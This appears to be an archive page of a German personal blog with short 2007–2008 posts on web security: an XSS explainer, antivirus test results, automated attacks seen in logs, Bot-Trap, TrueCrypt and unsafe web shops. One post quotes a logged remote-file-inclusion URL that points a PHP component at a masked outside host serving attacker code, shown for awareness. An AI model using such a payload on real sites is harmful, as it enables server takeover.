CSS / XSS Angriffe erklärt

20.10.2008 von Michael in Technik und Wissenswertes

Unter Cross Site Scripting versteht man das unbemerkte Einbinden von Skripten auf fremden Webseiten. Sprich der Angreifer verändert die Webseite so, dass sein gewünschter Code beim Aufrufen durch andere nichts wissenden Besuchern ausgeführt wird. Diese Gefahr ist allgegenwärtig und kann jeden Webmaster treffen, ein Grund mehr das Thema zu behandeln.

Damit man überhaupt mal weiß wie sowas funktioniert um sich auch entsprechend schützen zu können, muss man sich unbedingt mal den Artikel auf erich-kachel.de durchlesen. Dort werden interessante und wichtige Informationen im Bezug auf XSS vermittelt. Das kann auch für normale Surfer interessant sein, da diese dann mehr darauf achten können wie ein infezierter Link aussieht.

Was ermöglicht JavaScript (mittels XSS):

• das Ändern der gesamten Seitenstruktur,
• das Einbinden zusätzlichen JavaScript-Codes,
• das Erzeugen beliebiger HTML-Elemente,
• das Umleiten von Formularen und Links,
• das Auslesen von Authentifizierungs-Daten,
• das Senden und Empfangen von Daten und
• das Auslesen der Tastenanschläge

Hier weiterlesen.

Kein Kommentar - jetzt schreiben

Rundumschutz für den Heim-PC

24.03.2008 von Michael in Wissenswertes

Zahlreiche Internet-Security-Suiten werben überall mit ihrem Können und der Fähigkeit alles sicherer zu machen, doch was ist das von Tatsache? Die Ausbeute ist ernüchternd, im aktuellen Test der Zeitschrift c’t kam der Rundumschutz von G Data und Trend Micro am besten voran. Schon im letzten Anti-Viren-Pogramm Test hat sich das Magazin für G Data entschieden.

Für G Data sprechen folgende Punkte:

• Schnelle Signatur Erkennung von Schadsoftware und Ad- und Spyware
• Sehr schnelle Update und Reaktionszeit auf Veränderungen durch den Hersteller
• Backup, Verschlüsselung und Online-Backup möglich
• Spam wurde rund 89 % erkannt
• Erkennt 7 von 10 Phishing Seiten
• akzeptable Kindersicherung
• Gute Ergebnisse im Erkennen von Viren und Spyware-Programme
• Gute Ergebnisse als Firewall unter Windows XP

Der Test ist in der c’t Nummer 7 vom 17.03.2008 auf Seite 169 zu lesen. Insgesamt wurden 12 Angebote getestet.

Kein Kommentar - jetzt schreiben

Sicherheitsrisiken einer Homepage durch automatisierte Angriffe

22.02.2008 von Michael in Wissenswertes

Derzeit habe ich ein Plugin laufen, welches mir jeden “Fehltritt” eines Besuchers speichert und ausgibt. Ursprünglich setzt es automatisch und manuell Weiterleitungen von nicht mehr existenten Seiten auf ausgewählte oder eben die richtige neue Seite.

Wenn dann ein Link ins leere läuft und einen 404-Error-Code erzeugt werden alle Informationen in eine Liste geschrieben. Schöner Nebeneffekt ist, dass ich aufgrund meiner Infrastruktur der Links auch gleichzeitig jeden versuchten PHP-Angriff sehe.

Das Ganze sieht dann in etwa so aus:

http://www.webregard.de/components/ com_mp3_allopass/allopass.php?osConfig_live_site= http://$$$$$$.com.cn/zhuanti/dkp/02.txt?

Ich habe mir mal die Mühe gemacht und die ganzen Attacken via SQL zusammenzufassen und auszugeben, dabei kommen folgende Ergebnisse raus welche eine schöne Übersicht gibt:

Den ganzen Bericht lesen…

Kein Kommentar - jetzt schreiben

TrueCrypt – Systempartition verschlüsseln

18.02.2008 von Michael in Wissenswertes

Mit der aktuellen Version 5.0 des von mir hoch geschätzten Tools TrueCrypt kann man jetzt auch die Windows-Partition oder gesamte Festplatte verschlüsseln und somit ein Maximum an Sicherheit (eben auch für Konfigurationsdateien) erreichen. Ein Bootloader verlangt dann beim Start die Eingabe des Passwortes und schaltet somit die Daten frei.

Das freie Programm besitzt, weil es ja gerade Open-Source ist, nicht wie alle kommerziellen Verschlüsselungs-Programme einen Backdoor für die Regierung. Meine Nummer Eins wenn es um Datenverschlüsselung geht.

Den ganzen Bericht lesen…

1 Kommentar

htaccesseditor.com – Bequem und einfach .htaccess erstellen

13.02.2008 von Michael in Web 2.0

Der japanische Dienst htaccesseditor.com von Ryoken&Mannen bietet die Möglichkeit ganz im Web 2.0 Stil seine eigene .htaccess Datei zu erstellen. Man kann zwischen den Möglichkeiten “Standart Authentifizierung” (Verzeichnisschutz), Fehlerseiten, Weiterleitungen und Zugriffsbeschränkungen einzustellen.

Das ganze wird in ein nettes Design mit Schnellklick-Funktion gepackt. Dadurch wird es Benutzerfreundlich und interessant. Jedoch muss man beachten, dass ohne den Zusatz gr.shtml an der Domain der Service mehr oder weniger unleserlich wird.

Kein Kommentar - jetzt schreiben

Hitmeister.de – Alternative zu Ebay?

20.12.2007 von Michael in Business

Als neuer Ableger der Hitflip Media Trading GmbH aus Köln verspricht sich als neuer Marktplatz zum Kauf und Verkauf von gebrauchten und neuen Medien wie DVDs, Bücher, CDs, Spiele, Hörbücher. In Zukunft sollen auch noch andere Produkte vertrieben werden. Im Gegensatz zu Hitflip.de tauscht man auf Hitmeister.de keine Produkte, sondern Kauft diese wie bei Amazon.de oder Ebay.de ein.

Der große Unterschied soll in der Garantie und Sicherheit des Shops liegen:

Käufer sind über die Hitmeister-Produktgarantie geschützt. Wird ein Artikel nicht geliefert oder entspricht der Artikel nicht der Beschreibung des Verkäufers, erhält der Käufer sein Geld zurück. Verkäufer erhalten die Hitmeister-Zahlungsgarantie. Durch das Hitmeister-Treuhandsystem ist der Verkäufer gegen das Risiko des Zahlungsausfalls geschützt. Bei Streitfällen zwischen Käufern und Verkäufern vermittelt Hitmeister.

Wenn das so stimmt und man einen direkteren Kontakt anders wie bei Ebay hat, kann sich diese neue deutsche Produktbörse gut etablieren. Ein weitere Pluspunkt sind die einheitlichen Versandkosten (1,90 bis 4,90 Euro). Es kann mit Kreditkarte, Überweisung, Moneybookers und Paypal bezahlt werden.

Den ganzen Bericht lesen…

3 Kommentare

Wo setzen automatisierte Hack-Scripts an?

20.12.2007 von Michael in Wissenswertes

Mit Hilfe des Bot-Trap Projektes ist es mir möglich einen kleinen Blick auf das automatisierte Vorgehen von Hackern zu werfen. Dabei ist auf Anhieb zu sehen, dass diese natürlich auf quell-offene Anwendungen setzen. Beliebt sind Blogs und Foren.

Zusätzlich gehe ich davon aus, dass ein Teil der Angriffe gar nicht gestartet wird. Entweder ist es nicht ersichtlich um welche Webanwendung es sich bei meiner Domain handelt, da geblockt durch Bot-Trap oder dass die derzeitige Automatisierung nicht für Wordpress ausgelegt ist und gleich “weiter geht”.

Dennoch konnte ich eine gewisse Anzahl versuchter Angriffe in den letzten 30 Tagen verzeichnen. Sollte eine Injektion von fremden Code funktionieren, versucht der Großteil über einfache PHP-Scripte erstmal die Server-Eigenschaften auszuspionieren. Der kleinere Teil legt gleich mit voll ausgebauten PHP-Scripten los, welche zB. von Kaspersky sofort als “Trojan program Backdoor.PHP.Small.o” oder ähnlichem markiert werden.

Ein Diagramm mit den Anteilen verschiedener Methoden:

Den ganzen Bericht lesen…

2 Kommentare

Bot-Trap – Türsteher für unerwünschte Gäste

26.11.2007 von Michael in Technik

Bei meinem nächtlichen Internetspaziergang bin ich auf das Projekt Bot-Trap gestoßen. Ziel dieses Projekts ist es Schädlinge in Form von automatisierten Hack-Skripten oder Content-Grabbern von seiner Website auszuschließen.

1. Das Ganze läuft wie folgt in fünf Schritten ab, der Webseiten-Betreiber registriert sich in dem Forum und stellt sich möglichst ausführlich vor. Daraufhin wird dieser nach Ermessen der Moderatoren akzeptiert oder eben nicht.
   Das hat den Vorteil, dass böse Bot-Betreiber keine direkte Einsicht in dem Programmcode des Projektes haben sollen.
   
2. Der Betreiber bekommt eine PHP-Datei welche er in jede andere Datei einbinden muss.
3. Wenn ein Test erfolgreich war, werden nun alle von der Community zusammengetragenen böse User Agents sowie bestimmte IP-Adressen gesperrt.
   Durch mehrere Sicherheitsebenen wird versuch, dass ein Google-Bot oder normale Internetsurfer nicht ausgeschlossen werden. An erster Stelle wird im Forum ein (nicht) Schädling gemeldet, dieser wird von den Moderatoren Überprüft und somit (ent)gesperrt. Unbekannte Bots werden im Zweifelsfall gesperrt!
   
4. In einem unregelmäßigen Rhythmus wird die PHP-Datei automatisch aktualisiert.
   Der Benutzer kann das auch manuell machen. Es besteht auch die Möglichkeit selbst bestimmte User-Agents oder IP-Adressen für die eigene Webseite zu (ent)sperren.

   Den ganzen Bericht lesen…

4 Kommentare

Erkennung eines unsicheren Web-Shops

22.11.2007 von Michael in Wissenswertes

Gerade in der Weihnachtszeit werden oft viele Kunden über den Tisch gezogen, da ist es sinvoll nicht nur auf Ebay folgende Punkte zu beachten.

Es gibt 10 Punkte, an denen man einen unsicheren Internetshop erkennen kann.

1. Der Anbieter oder derjenige welcher hinter dem Internetshop steht verschleiert seinen Namen (Nur Angabe von einem Postfach)
2. Es werden unklare Angaben zum Datenschutz oder uneinsichtige Angaben in de AGBs gemacht
3. Der exakte Preis eines Produktes ist nicht feststellbar, sprich Mehrwertsteuer und Versandkosten sind nicht angegeben
4. Keine klaren Angaben bei den Lieferzeiten (zb. Lieferzeiten unverbindlich)
5. Der Web-Shop ist unverschlüsselt (erkennbar an dem https im Adressfeld)
6. Das 14-tägige Rückgaberecht wird eingeschränkt (zb. Angebotsware ausgeschlossen oder nur original verpackte Ware wird zurückgenommen)
7. Auffälligkeiten im Kleingedruckten oder den AGBs (Lieferung auf Gefahr des Käufers, oder sofortige Meldung von Schäden)
8. Kundenservice nicht vorhanden (es geht keiner ans Telefon oder keine Antwort auf E-Mails)
9. Der Betreiber bietet nur per Vorkasse an und keine anderen Methoden
10. Wenn Sie den Anbieter in einer Suchmaschine finde, stehen dort oft schlechte Bewertungen

Oftmals haben seriöse Web-Shops diverse Sicherheitssigel von gewissen Unternehmen wie Trusted Shops Gmbh.

Kein Kommentar - jetzt schreiben